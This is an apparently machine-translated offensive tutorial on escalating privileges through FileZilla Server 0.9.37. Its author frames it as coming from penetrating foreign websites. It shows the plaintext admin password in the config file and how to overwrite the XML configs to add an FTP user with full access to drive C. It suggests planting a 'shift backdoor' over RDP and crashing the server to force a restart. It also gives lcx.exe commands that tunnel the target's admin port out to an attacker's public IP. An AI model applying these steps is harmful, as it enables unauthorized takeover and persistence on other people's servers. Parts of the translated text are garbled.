Test of FileZilla Privilege Escalation

Author: LengF

The latest penetration of some foreign websites encountered a lot of servers are using FileZilla_Server for FTP server, so I downloaded a local first test to see if there is any way to escalate permissions, which is written here. The version tested in this article is the FileZilla_Server-0_9_37.

1. Test Basic Information

Default installation path C: ProgramFilesFileZilla Server

Default Administrator port: 14147 (can be modified after installation)

Access FTP port: 21

Install two important XML files in the directory

C: Program FilesFileZilla ServerFileZillaServer Interface. xml

C: Program FilesFileZilla ServerFileZilla Server. xml

After the installation is complete, a logon box is displayed. you can log on with any password you enter. However, for the second login, you must enter the password for your first installation. You can change the password after logon.

(1) FileZilla Server Interface. xml file

This file is used to save the Administrator's logon information. The password is also in the file and saved in plaintext. The format is as follows:

<FileZillaServer>

<Settings>

<Item name = "Last Server Address" type = "string"> 127.0.0.1 </Item>

<Item name = "Last Server Port" type = "numeric"> 14147 </Item>

<Item name = "Last Server Password" type = "string"> adminpass </Item>

<Item name = "Always use last server" type = "numeric"> 0 </Item>

</Settings>

</FileZillaServer>

The Last ServerAddress is the IP address of the Last Management Terminal login, And the Last Server Password is the Password. The saved port is the Management port. By default, only access to the local 127.0.0.1 is allowed.

(2) FileZilla Server. xml file

This file is used to save information of common ftp users. The default format after installation is as follows:

<FileZillaServer>

<Settings>

<Item name = "Admin port" type = "numeric"> 14147 </Item>

</Settings>

</FileZillaServer>

(3) Startup Mode

By default, the system is loaded by Server. The service name is FileZilla server FTP Server. You can start and stop the service in the command. The command is as follows:

Net start "FileZilla Server FTPserver"

Net stop "FileZilla Server FTPserver"

You can use net start to check whether the service is started.

2. Modified Information Detection

This section mainly tests some security-related items, including remote connection and user management.

(1) Add IP addresses that allow remote ftp Management

Start the server program, select Edit> Settings once in the menu bar, and find the Admin Interface settings menu. This mainly sets some access settings on the Management end, 01

 

 

To enable the remote management function, you must bind the IP address of the Management end, that is, the IP address of the FTP server (public IP). If you are an Internet IP address, step 2 Add the management IP address that allows logon, that is, your current public IP address. In this way, click OK to take effect. Let's see how this configuration is saved. Open the FileZillaServer. xml file in the installation directory and follow our modifications:
<Item name = "Admin IP Bindings" type = "string"> 192.168.11.7 </Item>

<Item name = "Admin IPAddresses" type = "string"> 192.168.11.11 </Item>

The first is the IP address of the ftp server, and the second is the IP address that allows connection to the ftp server management end.

(2) Add an FTP user

Select Edit-> Users. Click Add to Add an account, but Add a user group first.

Select Edit-> Groups and click Add to Add a user group, such as the LengF user group. 02:

After adding the file, let's look at the changes in the file. open the file FileZilla Server. xml in the installation directory and see the following:

<Groups>
<Group Name = "lengf">

<Option Name = "Bypass server userlimit"> 0 </Option>

<Option Name = "User Limit"> 0 </Option>

<Option Name = "IP Limit"> 0 </Option>

<Option Name = "Enabled"> 1 </Option>

<Option Name = "Comments"> </Option>

<Option Name = "ForceSsl"> 0 </Option>

<IpFilter>

<Disallowed/>

<Allowed/>

</IpFilter>

<Permissions/>

<SpeedLimits DlType = "1" DlLimit = "10" ServerDlLimitBypass = "0" UlType = "1" UlLimit = "10" ServerUlLimitBypass = "0">

<Download/>

<Upload/>

</SpeedLimits>

</Group>

</Groups>

This is the code for adding a user group. Next, add a common user and follow the steps above. 03:

 

After adding the user, let's look at the file changes and open the FileZilla Server. xml file in the installation directory. The added code is as follows:

<Users>
<User Name = "81sec.com">
<Option Name = "Pass"> </Option>
<Option Name = "Group"> lengf </Option>
<Option Name = "Bypass server userlimit"> 2 </Option>
<Option Name = "User Limit"> 0 </Option>
<Option Name = "IP Limit"> 0 </Option>
<Option Name = "Enabled"> 2 </Option>
<Option Name = "Comments"> </Option>
<Option Name = "ForceSsl"> 2 </Option>
<IpFilter>
<Disallowed/>
<Allowed/>
</IpFilter>
<Permissions/>
<SpeedLimits DlType = "0" DlLimit = "10" ServerDlLimitBypass = "2" UlType = "0" UlLimit = "10" ServerUlLimitBypass = "2">
<Download/>
<Upload/>
</SpeedLimits>
</User>

</Users>

It can be seen that FTP stores user information through XML. The analysis is mainly used for permission escalation below.

3. Ideas in Elevation of Privilege

If the FileZilla Server installation directory has the modification permission, you can add a common user. You only need to grant all the permissions of drive C to the user. If the other party opens 3389, a shift backdoor is sent directly. Find the installation directory and back up two files, FileZilla ServerInterface. xml and FileZillaServer. xml, and then overwrite the following two files to the two files and restart the server. The configuration of these two files is described as follows:

Add a username 81sec.com and password 123. The user group is Lengf. This is a required user group. Modify the username according to the user group on your server. The default path is c: disk, and has the read/write permission to change. If you have the permission, it depends on how you use it. If this file has the modification permission, you can directly modify it. In addition, remember to modify the server address and the IP address that allows connection management. The modification code is as follows:

<Item name = "Admin IP Bindings" type = "string"> 192.168.11.11 </Item>

<Item name = "Admin IPAddresses" type = "string"> 192.168.11.7 </Item>

However, the server needs to restart the ftp server or the server. If you can execute the command, stop the service first and then start the service to take effect.

Net start "FileZilla Server FTPserver"

Net stop "FileZilla Server FTPserver"

After restart, it will be OK! Assume that you can directly log on to and manage FTP. However, we recommend that you do not modify the IP addresses allowed for connection. Simply add an account. The format is extracted from the above two files.

4. troubleshooting

(1) The service cannot be restarted.

One way on the network is to consume system resources and force the server to restart. This tool is provided below and can be completed with the GUEST permission. It also depends on the memory size.

(2) the configuration file has only the read permission.

If the installation directory is only readable, it is difficult to do, but there is no such thing. By default, the installation only allows 127.0.0.1 to connect to the FTP server, so the local listening port is 14147 by default, we can use the port forwarding tool to forward the port. If the server is not in the Intranet, any port can be forwarded. If the server is in the Intranet? We also have a solution. Do you remember the 3389 bounce connection method? Yes, LCX can be used to forward Intranet ports, and it is in rebound mode. Here I will demonstrate how to use lcx (in the Intranet ). If you have a public IP address that can send a negative image to your host, you can use lcx.exe to listen to a port, for example:

Lcx.exe-listen 51 (14147)

51 is the port mapped to the target server, and the 14147 is the port of your local FileZillaServer. Next, run the following command on the target server:

Lcx.exe-slave 123.123.123.123 51 127.0.0.114147

123.123.123.123 is the attacker's public IP address, 51 is the attacker's listening port, 127.0.0.1 is on the target server, and 14147 is the FileZillaServer's Management port of the target server. 04, 05:
 

Figure 04 attack listening on this port

Figure 05 on the target server